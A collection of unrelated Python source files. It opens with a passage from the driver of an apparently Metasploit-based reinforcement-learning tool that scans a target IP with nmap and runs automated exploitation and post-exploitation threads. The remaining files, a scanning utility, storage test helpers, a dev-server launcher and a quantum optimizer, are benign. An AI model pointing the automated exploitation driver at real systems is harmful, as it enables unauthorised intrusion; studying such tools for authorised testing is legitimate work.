██║ ╚═╝ ██║╚██████╔╝██║ ╚██████╔╝███████║██║ ███████╗╚██████╔╝██║ ██║
╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
"""
util.print_message(NONE, banner)
show_credit(util)
time.sleep(delay_time)
def is_valid_ip(rhost):
try:
ipaddress.ip_address(rhost)
return True
except ValueError:
return False
def show_credit(util):
credit = u"""
+ -- --=[ Maintainer : Manish Bhatt (@mbhatt1) ]=--
+ -- --=[ Website : https://github.com/mbhatt1/Mofosploit ]=--
"""
util.print_message(NONE, credit)
# Define command option.
__doc__ = """{f}
Usage:
{f} (-t <ip_addr> | --target <ip_addr>) (-m <mode> | --mode <mode>)
{f} (-t <ip_addr> | --target <ip_addr>) [(-p <port> | --port <port>)] [(-s <product> | --service <product>)]
{f} -h | --help
Options:
-t --target Require : IP address of target server.
-m --mode Require : Execution mode "train/test".
-p --port Optional : Indicate port number of target server.
-s --service Optional : Indicate product name of target server.
-h --help Optional : Show this screen and exit.
""".format(f=__file__)
# Parse command arguments.
def command_parse():
args = docopt(__doc__)
ip_addr = args['<ip_addr>']
mode = args['<mode>']
port = args['<port>']
service = args['<product>']
return ip_addr, mode, port, service
# Check parameter values.
def check_port_value(port=None, service=None):
if port is not None:
if port.isdigit() is False:
Utilty().print_message(OK, 'Invalid port number: {}'.format(port))
return False
elif (int(port) < 1) or (int(port) > 65535):
Utilty().print_message(OK, 'Invalid port number: {}'.format(port))
return False
elif port not in com_port_list:
Utilty().print_message(OK, 'Not open port number: {}'.format(port))
return False
elif service is None:
Utilty().print_message(OK, 'Invalid service name: {}'.format(str(service)))
return False
elif type(service) == 'int':
Utilty().print_message(OK, 'Invalid service name: {}'.format(str(service)))
return False
else:
return True
else:
return False
# Common list of all threads.
com_port_list = []
com_exploit_list = []
com_payload_list = []
com_indicate_flag = False
if __name__ == '__main__':
util = Utilty()
# Get command arguments.
rhost, mode, port, service = command_parse()
if is_valid_ip(rhost) is False:
util.print_message(FAIL, 'Invalid IP address: {}'.format(rhost))
exit(1)
if mode not in ['train', 'test']:
util.print_message(FAIL, 'Invalid mode: {}'.format(mode))
exit(1)
# Show initial banner.
show_banner(util, 0.1)
# Initialization of Metasploit.
env = Metasploit(rhost)
if rhost in env.prohibited_list:
util.print_message(FAIL, 'Target IP={} is prohibited.\n'
' Please check "config.ini"'.format(rhost))
exit(1)
nmap_result = 'nmap_result_' + env.rhost + '.xml'
nmap_command = env.nmap_command + ' ' + nmap_result + ' ' + env.rhost + '\n'
env.execute_nmap(env.rhost, nmap_command, env.nmap_timeout)
com_port_list, proto_list, info_list = env.get_port_list(
nmap_result, env.rhost)
com_exploit_list = env.get_exploit_list()
com_payload_list = env.get_payload_list()
com_payload_list.append('no payload')
# Create exploit tree.
exploit_tree = env.get_exploit_tree()
# Create target host information.
com_indicate_flag = check_port_value(port, service)
if com_indicate_flag:
target_tree, com_port_list = env.get_target_info_indicate(
rhost, proto_list, info_list, port, service)
else:
target_tree = env.get_target_info(rhost, proto_list, info_list)
# Initialization of global option.
TRAIN_WORKERS = env.train_worker_num
TEST_WORKER = env.test_worker_num
MAX_STEPS = env.train_max_steps
MAX_TRAIN_NUM = env.train_max_num
Tmax = env.train_tmax
# Disconnect common MSFconsole.
env.client.termination(env.client.console_id)
NUM_ACTIONS = len(com_payload_list) # Set action number.
NONE_STATE = np.zeros(NUM_STATES) # Initialize state (s).
# Define global variable, start TensorFlow session.
frames = 0 # All trial number of all threads.
isFinish = False # Finishing learning/testing flag.
post_exploit_count = 0 # Number of successful post-exploitation.
exploit_count = 0 # Number of successful exploitation.
plot_count = [0] # Exploitation count list for plot.
plot_pcount = [0] # Post-exploit count list for plot.
SESS = tf.Session() # Start TensorFlow session.
with tf.device("/cpu:0"):
parameter_server = ParameterServer()
threads = []
if mode == 'train':
# Create learning thread.
for idx in range(TRAIN_WORKERS):
thread_name = 'local_thread' + str(idx + 1)
threads.append(Worker_thread(thread_name=thread_name,
thread_type="learning",
parameter_server=parameter_server,
rhost=rhost))
else:
# Create testing thread.
for idx in range(TEST_WORKER):
thread_name = 'local_thread1'
threads.append(Worker_thread(thread_name=thread_name,
thread_type="test",
parameter_server=parameter_server,
rhost=rhost))
# Define saver.
saver = tf.train.Saver()
# Execute TensorFlow with multi-thread.
COORD = tf.train.Coordinator() # Prepare of TensorFlow with multi-thread.
SESS.run(tf.global_variables_initializer()) # Initialize variable.
running_threads = []
if mode == 'train':
# Load past learned data.
if os.path.exists(env.save_file) is True:
# Restore learned model from local file.
util.print_message(OK, 'Restore learned data.')
saver.restore(SESS, env.save_file)
# Execute learning.
for worker in threads:
def job(): return worker.run(exploit_tree, target_tree, saver, env.save_file)
t = threading.Thread(target=job)
t.start()
else:
# Execute testing.
# Restore learned model from local file.
util.print_message(OK, 'Restore learned data.')
saver.restore(SESS, env.save_file)
for worker in threads:
def job(): return worker.run(exploit_tree, target_tree)
t = threading.Thread(target=job)
t.start()
|
bulkscan.py
|
#!/usr/bin/python3
# bulkscan - Document scanning and maintenance solution
# Copyright (C) 2019-2019 Johannes Bauer
#
# This file is part of bulkscan.
#
# bulkscan is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; this program is ONLY licensed under
# version 3 of the License, later versions are explicitly excluded.
#
# bulkscan is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with bulkscan; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Johannes Bauer <JohannesBauer@gmx.de>
import os
import sys
import uuid
import json
import subprocess
import datetime
import glob
import re
import queue
import time
import threading
from Tools import Tools
from FriendlyArgumentParser import FriendlyArgumentParser
class ConversionJob():
def __init__(self, infile, outfile, meta = None):
self._infile = infile
self._outfile = outfile
self._meta = meta
def start(self):
jsonexif = json.dumps(self._meta)
subprocess.check_call([ "convert", "-units", "PixelsPerInch", "-density", str(self._meta["resolution"]), "-comment", jsonexif, self._infile, self._outfile ])
os.unlink(self._infile)
def __str__(self):
return "%s -> %s" % (self._infile, self._outfile)
class JobServer():
def __init__(self, concurrent_jobs = 12):
self._queue = queue.Queue()
self._threads = [ threading.Thread(target = self._thread_function) for i in range(concurrent_jobs) ]
self._quit = False
for thread in self._threads:
thread.start()
def add(self, job):
self._queue.put(job)
def shutdown(self):
self._quit = True
while not self._queue.empty():
time.sleep(1)
def _thread_function(self):
while True:
try:
job = self._queue.get(timeout = 0.1)
job.start()
except queue.Empty:
if self._quit:
break
class BatchScanner():
def __init__(self, args):
self._args = args
with open(self._args.config_file) as f:
self._config = json.load(f)
try:
os.makedirs(self._args.outdir)
except FileExistsError:
pass
self._scan_id = 0
regex = re.compile("^bulk_(?P<id>\d{5})")
for filename in os.listdir(self._args.outdir):
match = regex.match(filename)
if match:
match = match.groupdict()
self._scan_id = max(self._scan_id, int(match["id"]))
self._jobserver = JobServer(concurrent_jobs = 12)
def scan_next_batch(self):
batch_uuid = str(uuid.uuid4())
scan_cmd = [ "scanimage", "--mode", self._args.mode, "--resolution", str(self._args.resolution), "--batch=" + self._args.tempdir + "/scan_" + batch_uuid + "_%05d.pnm" ] + self._config["scan_cmdline"]
subprocess.call(scan_cmd)
infiles = [ ]
regex = re.compile("scan_" + batch_uuid + "_(?P<no>\d{5}).pnm")
for filename in glob.glob(self._args.tempdir + "/scan_" + batch_uuid + "_?????.pnm"):
match = regex.search(filename)
match = match.groupdict()
pageno = int(match["no"])
infiles.append((pageno, filename))
infiles.sort()
now = datetime.datetime.utcnow()
for (pageno, infile) in infiles:
self._scan_id += 1
outfile = self._args.outdir + "/bulk_%05d_%05d.png" % (self._scan_id, pageno)
job = ConversionJob(infile = infile, outfile = outfile, meta = {
"batch_uuid": batch_uuid,
"created_utc": now.strftime("%Y-%m-%dT%H:%M:%SZ"),
"resolution": self._args.resolution,
"mode": self._args.mode,
})
self._jobserver.add(job)
def run(self):
while True:
result = input("Ready to scan next batch (q to quit)...")
result = result.strip()
if result == "q":
break
self.scan_next_batch()
self._jobserver.shutdown()
parser = FriendlyArgumentParser()
parser.add_argument("-c", "--config-file", metavar = "filename", type = str, default = "config.json", help = "Configuration file to read. Defaults to %(default)s.")
parser.add_argument("-o", "--outdir", metavar = "dirname", type = str, default = "output/", help = "Output directory to place files in. Defaults to %(default)s.")
parser.add_argument("-r", "--resolution", metavar = "dpi", type = int, default = 300, help = "Resolution to use in dots per inch, defaults to %(default)d dpi.")
parser.add_argument("-m", "--mode", choices = [ "gray" ], default = "gray", help = "Scan mode to use. Can be one of %(choices)s, defaults to %(default)s.")
parser.add_argument("-t", "--tempdir", metavar = "dirname", type = str, default = "/tmp", help = "Temporary directory to keep raw files. Defaults to %(default)s")
args = parser.parse_args(sys.argv[1:])
scanner = BatchScanner(args)
scanner.run()
|
ec_utils.py
|
#!/usr/bin/python
"""
(C) Copyright 2020-2022 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import re
import threading
import queue
import time
from nvme_utils import ServerFillUp
from daos_utils import DaosCommand
from test_utils_container import TestContainer
from apricot import TestWithServers
from mdtest_test_base import MdtestBase
from fio_test_base import FioBase
from pydaos.raw import DaosApiError
from exception_utils import CommandFailure
from general_utils import DaosTestError, run_pcmd
def get_data_parity_number(log, oclass):
"""Return EC Object Data and Parity count.
Args:
log: Log object for reporting error
oclass(string): EC Object type.
return:
result[list]: Data and Parity numbers from object type
"""
if 'EC' not in oclass:
log.error("Provide EC Object type only and not %s", str(oclass))
return 0
tmp = re.findall(r'\d+', oclass)
return {'data': tmp[0], 'parity': tmp[1]}
def check_aggregation_status(pool, quick_check=True, attempt=20):
"""EC Aggregation triggered status.
Args:
pool(object): pool object to get the query.
quick_check(bool): Return immediately when Aggregation starts for any storage type.
attempt(int): Number of attempts to do pool query at interval of 5 seconds.
default is 20 attempts.
return:
result(dic): Storage Aggregation stats SCM/NVMe True/False.
"""
agg_status = {'scm': False, 'nvme': False}
pool.connect()
initial_usage = pool.pool_percentage_used()
for _tmp in range(attempt):
current_usage = pool.pool_percentage_used()
print("pool_percentage during Aggregation = {}".format(current_usage))
for storage_type in ['scm', 'nvme']:
if current_usage[storage_type] > initial_usage[storage_type]:
print("Aggregation Started for {}.....".format(storage_type))
agg_status[storage_type] = True
# Return immediately once aggregation starts for quick check
if quick_check:
return agg_status
time.sleep(5)
return agg_status
class ErasureCodeIor(ServerFillUp):
# pylint: disable=too-many-ancestors
"""
Class to used for EC testing.
It will get the object types from yaml file write the IOR data set with IOR.
"""
def __init__(self, *args, **kwargs):
"""Initialize a ServerFillUp object."""
super().__init__(*args, **kwargs)
self.server_count = None
self.ec_container = None
self.cont_uuid = []
self.cont_number = 0
self.read_set_from_beginning = True
self.nvme_local_cont = None
def setUp(self):
"""Set up each test case."""
# Start the servers and agents
super().setUp()
# Fail IOR test in case of Warnings
self.fail_on_warning = True
engine_count = self.server_managers[0].get_config_value("engines_per_host")
self.server_count = len(self.hostlist_servers) * engine_count
# Create the Pool
self.create_pool_max_size()
self.update_ior_cmd_with_pool()
self.obj_class = self.params.get("dfs_oclass_list", '/run/ior/objectclass/*')
self.ior_chu_trs_blk_size = self.params.get("chunk_block_transfer_sizes", '/run/ior/*')
def ec_container_create(self, oclass):
"""Create the container for EC object"""
# Get container params
self.ec_container = TestContainer(self.pool, daos_command=DaosCommand(self.bin))
self.ec_container.get_params(self)
self.ec_container.oclass.update(oclass)
# update object class for container create, if supplied explicitly.
ec_object = get_data_parity_number(self.log, oclass)
rf = "rf:{}".format(ec_object['parity'])
if self.ec_container.properties.value is None:
self.ec_container.properties.update(rf)
else:
self.ec_container.properties.update("{},{}"
.format(self.ec_container.properties.value, rf))
# create container
self.ec_container.create()
self.nvme_local_cont = self.ec_container
def ior_param_update(self, oclass, sizes):
"""Update the IOR command parameters.
Args:
oclass(list): list of the obj class to use with IOR
sizes(list): Update Transfer, Chunk and Block sizes
"""
self.ior_local_cmd.dfs_chunk.update(sizes[0])
self.ior_local_cmd.block_size.update(sizes[1])
self.ior_local_cmd.transfer_size.update(sizes[2])
self.ior_local_cmd.dfs_oclass.update(oclass[0])
self.ior_local_cmd.dfs_dir_oclass.update(oclass[0])
def ior_write_single_dataset(self, oclass, sizes, storage='NVMe', operation="WriteRead",
percent=1):
# pylint: disable=too-many-arguments
"""Write IOR single data set with EC object.
Args:
oclass(list): list of the obj class to use with IOR
sizes(list): Update Transfer, Chunk and Block sizes
storage(str): Data to be written on storage,default to NVMe.
operation(str): Data to be Written only or Write and Read both. default to WriteRead
both
percent(int): %of storage to be filled. Default it will use the given parameters in
yaml file.
"""
try:
self.log.info(self.pool.pool_percentage_used())
except ZeroDivisionError:
self.log.info("Either SCM or NVMe is used so ignore the error")
self.ior_param_update(oclass, sizes)
# Create the new container with correct redundancy factor for EC
self.ec_container_create(oclass[0])
self.update_ior_cmd_with_pool(create_cont=False)
# Start IOR Write
self.start_ior_load(storage, operation, percent, create_cont=False)
# Store the container UUID for future reading
self.cont_uuid.append(self.ior_local_cmd.dfs_cont.value)
def ior_write_dataset(self, storage='NVMe', operation="WriteRead", percent=1):
"""Write IOR data set with different EC object and different sizes.
Args:
storage(str): Data to be written on storage, default to NVMe
operation(str): Data to be Written only or Write and Read both. default to WriteRead
both.
percent(int): %of storage to be filled. Default it's 1%.
"""
for oclass in self.obj_class:
for sizes in self.ior_chu_trs_blk_size:
# Skip the object type if server count does not meet the minimum EC object server
# count
if oclass[1] > self.server_count:
continue
self.ior_write_single_dataset(oclass, sizes, storage, operation, percent)
def ior_read_single_dataset(self, oclass, sizes, storage='NVMe', operation="Read", percent=1):
# pylint: disable=too-many-arguments
"""Read IOR single data set with EC object.
Args:
oclass(list): list of the obj class to use with IOR
sizes(list): Update Transfer, Chunk and Block sizes
storage(str): Data to be written on which storage
operation(str): Data to be Read only or Auto_Read which select IOR blocksize during
runtime.
percent(int): %of storage to be filled. Default it's 1%.
"""
self.ior_param_update(oclass, sizes)
# retrieve the container UUID to read the existing data
self.nvme_local_cont.uuid = self.cont_uuid[self.cont_number]
# Start IOR Read
self.start_ior_load(storage, operation, percent, create_cont=False)
def ior_read_dataset(self, storage='NVMe', operation="Read", percent=1, parity=1):
"""Read IOR data and verify for different EC object and different sizes
Args:
storage(str): Data to be written on storage, default to NVMe
percent(int): %of storage to be filled. Default it's 1%
operation(str): Data to be Read only or Auto_Read which select IOR blocksize during
runtime.
parity(int): object parity type for reading data, default is 1.
"""
# By default read the data set from beginning, or start from the specific container UUID
if self.read_set_from_beginning:
self.cont_number = 0
for oclass in self.obj_class:
for sizes in self.ior_chu_trs_blk_size:
# Skip the object type if server count does not meet the minimum EC object server
# count.
if oclass[1] > self.server_count:
continue
parity_set = "P{}".format(parity)
# Read the requested data+parity data set only
if parity != 1 and parity_set not in oclass[0]:
print("Skipping Read as object type is {}".format(oclass[0]))
self.cont_number += 1
continue
self.ior_read_single_dataset(oclass, sizes, storage, operation, percent)
self.cont_number += 1
class ErasureCodeSingle(TestWithServers):
# pylint: disable=too-many-ancestors
# pylint: disable=too-many-instance-attributes
"""
Class to used for EC testing for single type data.
"""
def __init__(self, *args, **kwargs):
"""Initialize a TestWithServers object."""
super().__init__(*args, **kwargs)
self.server_count = None
self.set_online_rebuild = False
self.rank_to_kill = None
self.daos_cmd = None
self.container = []
def setUp(self):
"""Set up each test case."""
# Start the servers and agents
super().setUp()
engine_count = self.server_managers[0].get_config_value(
"engines_per_host")
self.server_count = len(self.hostlist_servers) * engine_count
self.obj_class = self.params.get("dfs_oclass_list", '/run/objectclass/*')
self.singledata_set = self.params.get("single_data_set", '/run/container/*')
self.add_pool()
self.out_queue = queue.Queue()
def ec_container_create(self, index, oclass):
"""Create the container for EC object
Args:
index(int): container number
oclass(str): object class for creating the container.
"""
self.container.append(TestContainer(self.pool))
# Get container parameters
self.container[index].get_params(self)
# update object class for container create, if supplied explicitly.
self.container[index].oclass.update(oclass)
# Get the Parity count for setting the container RF property.
ec_object = get_data_parity_number(self.log, oclass)
self.container[index].properties.update("rf:{}".format(ec_object['parity']))
# create container
self.container[index].create()
def single_type_param_update(self, index, data):
"""Update the data set content provided from yaml file.
Args:
index(int): container number
data(list): dataset content from test yaml file.
"""
self.container[index].object_qty.update(data[0])
self.container[index].record_qty.update(data[1])
self.container[index].dkey_size.update(data[2])
self.container[index].akey_size.update(data[3])
self.container[index].data_size.update(data[4])
def write_single_type_dataset(self, results=None):
"""Write single type data set with different EC object and different sizes.
Args:
results (queue): queue for returning thread results
"""
cont_count = 0
for oclass in self.obj_class:
for sizes in self.singledata_set:
# Skip the object type if server count does not meet the minimum EC object server
# count
if oclass[1] > self.server_count:
continue
# Create the new container with correct redundancy factor for EC object type
try:
self.ec_container_create(cont_count, oclass[0])
self.single_type_param_update(cont_count, sizes)
# Write the data
self.container[cont_count].write_objects(obj_class=oclass[0])
cont_count += 1
if results is not None:
results.put("PASS")
except (CommandFailure, DaosApiError, DaosTestError):
if results is not None:
results.put("FAIL")
raise
def read_single_type_dataset(self, results=None, parity=1):
"""Read single type data and verify for different EC object and different sizes.
Args:
results (queue): queue for returning thread results
parity(int): object parity number for reading, default All.
"""
cont_count = 0
self.daos_cmd = DaosCommand(self.bin)
for oclass in self.obj_class:
for _sizes in self.singledata_set:
# Skip the object type if server count does not meet the minimum EC object server
# count
if oclass[1] > self.server_count:
continue
parity_set = "P{}".format(parity)
# Read the requested data+parity data set only
if parity != 1 and parity_set not in oclass[0]:
print("Skipping Read as object type is {}".format(oclass[0]))
cont_count += 1
continue
self.daos_cmd.container_set_prop(pool=self.pool.uuid,
cont=self.container[cont_count].uuid,
prop="status",
value="healthy")
# Read data and verified the content
try:
if not self.container[cont_count].read_objects():
if results is not None:
results.put("FAIL")
self.fail("Data verification Error")
cont_count += 1
if results is not None:
results.put("PASS")
except (CommandFailure, DaosApiError, DaosTestError):
if results is not None:
results.put("FAIL")
raise
def start_online_single_operation(self, operation, parity=1):
"""Do Write/Read operation with single data type.
Args:
operation (string): Write/Read operation
"""
# Create the single data Write/Read threads
if operation == 'WRITE':
job = threading.Thread(target=self.write_single_type_dataset,
kwargs={"results": self.out_queue})
elif operation == 'READ':
job = threading.Thread(target=self.read_single_type_dataset,
kwargs={"results": self.out_queue,
"parity": parity})
# Launch the single data write/read thread
job.start()
# Kill the server rank while IO operation in progress
if self.set_online_rebuild:
time.sleep(10)
# Kill the server rank
if self.rank_to_kill is not None:
self.server_managers[0].stop_ranks([self.rank_to_kill], self.d_log, force=True)
# Wait to finish the thread
job.join()
# Verify the queue and make sure no FAIL for any run
while not self.out_queue.empty():
if self.out_queue.get() == "FAIL":
self.fail("FAIL")
class ErasureCodeMdtest(MdtestBase):
# pylint: disable=too-many-ancestors
"""
Class to used for EC testing for MDtest Benchmark.
"""
def __init__(self, *args, **kwargs):
"""Initialize a MdtestBase object."""
super().__init__(*args, **kwargs)
self.server_count = None
self.set_online_rebuild = False
self.rank_to_kill = None
self.obj_class = None
def setUp(self):
"""Set up each test case."""
super().setUp()
engine_count = self.server_managers[0].get_config_value("engines_per_host")
self.server_count = len(self.hostlist_servers) * engine_count
self.obj_class = self.params.get("dfs_oclass_list", '/run/mdtest/objectclass/*')
# Create Pool
self.add_pool()
self.out_queue = queue.Queue()
def write_single_mdtest_dataset(self):
"""Run MDtest with EC object type.
"""
# Update the MDtest obj class
self.mdtest_cmd.dfs_oclass.update(self.obj_class)
# Write the MDtest data
self.execute_mdtest(self.out_queue)
def start_online_mdtest(self):
"""Run MDtest operation with thread in background. Trigger the server failure while
MDtest is running
"""
# Create the MDtest run thread
job = threading.Thread(target=self.write_single_mdtest_dataset)
# Launch the MDtest thread
job.start()
# Kill the server rank while IO operation in progress
if self.set_online_rebuild:
time.sleep(30)
# Kill the server rank
if self.rank_to_kill is not None:
self.server_managers[0].stop_ranks([self.rank_to_kill],
self.d_log,
force=True)
# Wait to finish the thread
job.join()
# Verify the queue result and make sure test has no failure
while not self.out_queue.empty():
if self.out_queue.get() == "Mdtest Failed":
self.fail("FAIL")
class ErasureCodeFio(FioBase):
# pylint: disable=too-many-ancestors
"""
Class to use for EC testing with Fio Benchmark.
"""
def __init__(self, *args, **kwargs):
"""Initialize a FioBase object."""
super().__init__(*args, **kwargs)
self.server_count = None
self.set_online_rebuild = False
self.rank_to_kill = None
def setUp(self):
"""Set up each test case."""
super().setUp()
engine_count = self.server_managers[0].get_config_value("engines_per_host")
self.server_count = len(self.hostlist_servers) * engine_count
# Create Pool
self.add_pool()
self.out_queue = queue.Queue()
def stop_job_managers(self):
"""Cleanup dfuse in case of test failure."""
error_list = []
dfuse_cleanup_cmd = ["pkill dfuse --signal KILL",
"fusermount3 -uz {}".format(self.dfuse.mount_dir.value)]
for cmd in dfuse_cleanup_cmd:
results = run_pcmd(self.hostlist_clients, cmd)
for result in results:
if result["exit_status"] != 0:
error_list.append("Errors detected during cleanup cmd %s on node %s",
cmd, str(result["hosts"]))
error_list.extend(super().stop_job_managers())
return error_list
def write_single_fio_dataset(self, results):
"""Run Fio Benchmark.
Args:
results (queue): queue for returning thread results
"""
try:
self.execute_fio(stop_dfuse=False)
if results is not None:
results.put("PASS")
except (CommandFailure, DaosApiError, DaosTestError):
if results is not None:
results.put("FAIL")
raise
def start_online_fio(self):
"""Run Fio operation with thread in background. Trigger the server failure while Fio is
running
"""
# Create the Fio run thread
job = threading.Thread(target=self.write_single_fio_dataset,
kwargs={"results": self.out_queue})
# Launch the Fio thread
job.start()
# Kill the server rank while IO operation in progress
if self.set_online_rebuild:
time.sleep(30)
# Kill the server rank
if self.rank_to_kill is not None:
self.server_managers[0].stop_ranks([self.rank_to_kill],
self.d_log,
force=True)
# Wait to finish the thread
job.join()
# Verify the queue result and make sure test has no failure
while not self.out_queue.empty():
if self.out_queue.get() == "FAIL":
self.fail("FAIL")
|
run-server.py
|
import multiprocessing as mp
import socket
import subprocess
import sys
import time
from typing import Callable, List, Optional
# While we could use something like requests (or any other 3rd-party module),
# this script aims to work with the default Python 3.6+.
CLEAR = "\033[39m"
MAGENTA = "\033[95m"
BLUE = "\033[94m"
DB_PROT = 5433
MASTER_PORT = 8081
def kill_process(name: str, process: Optional[mp.Process]) -> None:
if process is not None and process.is_alive():
try:
process.terminate()
except Exception:
print(f"failed to kill process: {name}")
def wait_for_server(port: int, host: str = "localhost", timeout: float = 5.0) -> None:
for _ in range(100):
try:
with socket.create_connection((host, port), timeout=timeout):
return
except OSError:
time.sleep(1)
print(f"Timed out waiting for the {host}:{port}.")
def proc(name: str, cmd: List[str], logs_handler: Callable = lambda x: x) -> mp.Process:
def func() -> None:
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
) as p:
try:
assert p.stdout is not None
for line in p.stdout:
print(logs_handler(line.decode("utf8")), end="", flush=True)
except KeyboardInterrupt:
print(f"Killing Log stream for {name}")
return mp.Process(target=func, daemon=True)
def tail_db_logs() -> mp.Process:
return proc("database-logs", ["docker-compose", "logs", "-f"])
def run_master() -> mp.Process:
return proc(
"master",
["../../../master/build/determined-master", "--config-file", "master.yaml"],
logs_handler=lambda line: f"{MAGENTA}determined-master |{CLEAR} {line}",
)
def run_agent() -> mp.Process:
container_master_host = "host.docker.internal" if sys.platform == "darwin" else ""
return proc(
"agent",
[
"../../../agent/build/determined-agent",
"run",
"--config-file",
"agent.yaml",
"--container-master-host",
container_master_host,
],
logs_handler=lambda line: f"{BLUE}determined-agent |{CLEAR} {line}",
)
def is_db_running() -> bool:
try:
with socket.create_connection(("localhost", DB_PROT), timeout=0.5):
return True
except OSError:
return False
def main() -> None:
db, master, agent, db_logs = False, None, None, None
try:
master = run_master()
agent = run_agent()
db_logs = tail_db_logs()
if not is_db_running():
db = True
subprocess.check_call(["docker-compose", "up", "-d"])
wait_for_server(DB_PROT)
db_logs.start()
master.start()
wait_for_server(MASTER_PORT)
agent.start()
# Join the agent first so we can exit if the agent fails to connect to
# the master.
agent.join()
if agent.exitcode != 0:
raise Exception(f"agent failed with non-zero exit code {agent.exitcode}")
master.join()
db_logs.join()
except KeyboardInterrupt:
pass
finally:
kill_process("master", master)
kill_process("agent", agent)
kill_process("db-logs", db_logs)
if db:
subprocess.check_call(["docker-compose", "down"])
if __name__ == "__main__":
main()
|
p_bfgs.py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Parallelized Limited-memory BFGS optimizer"""
import logging
import multiprocessing
import platform
import warnings
from typing import Optional, List, Tuple, Callable
import numpy as np
from qiskit.utils import algorithm_globals
from qiskit.utils.validation import validate_min
from .optimizer import OptimizerResult, POINT
from .scipy_optimizer import SciPyOptimizer
logger = logging.getLogger(__name__)
class P_BFGS(SciPyOptimizer): # pylint: disable=invalid-name
"""
Parallelized Limited-memory BFGS optimizer.
P-BFGS is a parallelized version of :class:`L_BFGS_B` with which it shares the same parameters.
P-BFGS can be useful when the target hardware is a quantum simulator running on a classical
machine. This allows the multiple processes to use simulation to potentially reach a minimum
faster. The parallelization may also help the optimizer avoid getting stuck at local optima.
Uses scipy.optimize.fmin_l_bfgs_b.
For further detail, please refer to
https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.fmin_l_bfgs_b.html
"""
_OPTIONS = ["maxfun", "ftol", "iprint"]
# pylint: disable=unused-argument
def __init__(
self,
maxfun: int = 1000,
ftol: float = 10 * np.finfo(float).eps,
factr: Optional[float] = None,
iprint: int = -1,
max_processes: Optional[int] = None,
options: Optional[dict] = None,
max_evals_grouped: int = 1,
**kwargs,
) -> None:
r"""
Args:
maxfun: Maximum number of function evaluations.
ftol: The iteration stops when (f\^k - f\^{k+1})/max{\|f\^k\|,\|f\^{k+1}\|,1} <= ftol.
factr : (DEPRECATED) The iteration stops when (f\^k - f\^{k+1})/max{\|f\^k\|,
\|f\^{k+1}|,1} <= factr * eps, where eps is the machine precision,
which is automatically generated by the code. Typical values for
factr are: 1e12 for low accuracy; 1e7 for moderate accuracy;
10.0 for extremely high accuracy. See Notes for relationship to ftol,
which is exposed (instead of factr) by the scipy.optimize.minimize
interface to L-BFGS-B.
iprint: Controls the frequency of output. iprint < 0 means no output;
iprint = 0 print only one line at the last iteration; 0 < iprint < 99
print also f and \|proj g\| every iprint iterations; iprint = 99 print
details of every iteration except n-vectors; iprint = 100 print also the
changes of active set and final x; iprint > 100 print details of
every iteration including x and g.
max_processes: maximum number of processes allowed, has a min. value of 1 if not None.
options: A dictionary of solver options.
max_evals_grouped: Max number of default gradient evaluations performed simultaneously.
kwargs: additional kwargs for scipy.optimize.minimize.
"""
if max_processes:
validate_min("max_processes", max_processes, 1)
if factr is not None:
warnings.warn(
"P_BFGS.__init__() keyword argument factr is deprecated and replaced with ftol. "
"The relationship between the two is ftol = factr * numpy.finfo(float).eps. "
"See https://docs.scipy.org/doc/scipy/reference/optimize.minimize-lbfgsb.html.",
DeprecationWarning,
stacklevel=2,
)
ftol = factr * np.finfo(float).eps
if options is None:
options = {}
for k, v in list(locals().items()):
if k in self._OPTIONS:
options[k] = v
super().__init__(
method="L-BFGS-B",
options=options,
max_evals_grouped=max_evals_grouped,
**kwargs,
)
self._max_processes = max_processes
def optimize(
self,
num_vars,
objective_function,
gradient_function=None,
variable_bounds=None,
initial_point=None,
):
warnings.warn(
"The P_BFGS.optimize method is deprecated as of Qiskit Terra "
"0.19.0 and will be removed no sooner than 3 months after the release date. "
"Instead, use the P_BFGS.minimize method, which mimics the "
"signature of scipy.optimize.minimize.",
DeprecationWarning,
stacklevel=2,
)
result = self.minimize(
objective_function, initial_point, gradient_function, variable_bounds
)
return result.x, result.fun, result.nfev
def minimize(
self,
fun: Callable[[POINT], float],
x0: POINT,
jac: Optional[Callable[[POINT], POINT]] = None,
bounds: Optional[List[Tuple[float, float]]] = None,
) -> OptimizerResult:
x0 = np.asarray(x0)
num_procs = multiprocessing.cpu_count() - 1
num_procs = (
num_procs if self._max_processes is None else min(num_procs, self._max_processes)
)
num_procs = num_procs if num_procs >= 0 else 0
if platform.system() == "Darwin":
# Changed in version 3.8: On macOS, the spawn start method is now the
# default. The fork start method should be considered unsafe as it can
# lead to crashes.
# However P_BFGS doesn't support spawn, so we revert to single process.
major, minor, _ = platform.python_version_tuple()
if major > "3" or (major == "3" and minor >= "8"):
num_procs = 0
logger.warning(
"For MacOS, python >= 3.8, using only current process. "
"Multiple core use not supported."
)
elif platform.system() == "Windows":
num_procs = 0
logger.warning(
"For Windows, using only current process. Multiple core use not supported."
)
queue = multiprocessing.Queue()
# TODO: are automatic bounds a good idea? What if the circuit parameters are not
# just from plain Pauli rotations but have a coefficient?
# bounds for additional initial points in case bounds has any None values
threshold = 2 * np.pi
if bounds is None:
bounds = [(-threshold, threshold)] * x0.size
low = [(l if l is not None else -threshold) for (l, u) in bounds]
high = [(u if u is not None else threshold) for (l, u) in bounds]
def optimize_runner(_queue, _i_pt): # Multi-process sampling
_sol, _opt, _nfev = self._optimize(fun, _i_pt, jac, bounds)
_queue.put((_sol, _opt, _nfev))
